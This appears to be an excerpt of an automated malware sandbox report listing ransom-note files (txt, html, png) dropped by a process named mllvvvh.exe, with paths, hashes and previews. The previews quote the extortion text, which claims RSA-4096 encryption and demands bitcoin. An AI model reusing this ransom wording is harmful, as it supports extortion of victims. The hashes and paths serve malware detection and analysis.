                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Device Stage\Task\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Device Stage\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Device Stage\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Device Stage\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\DeviceSync\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
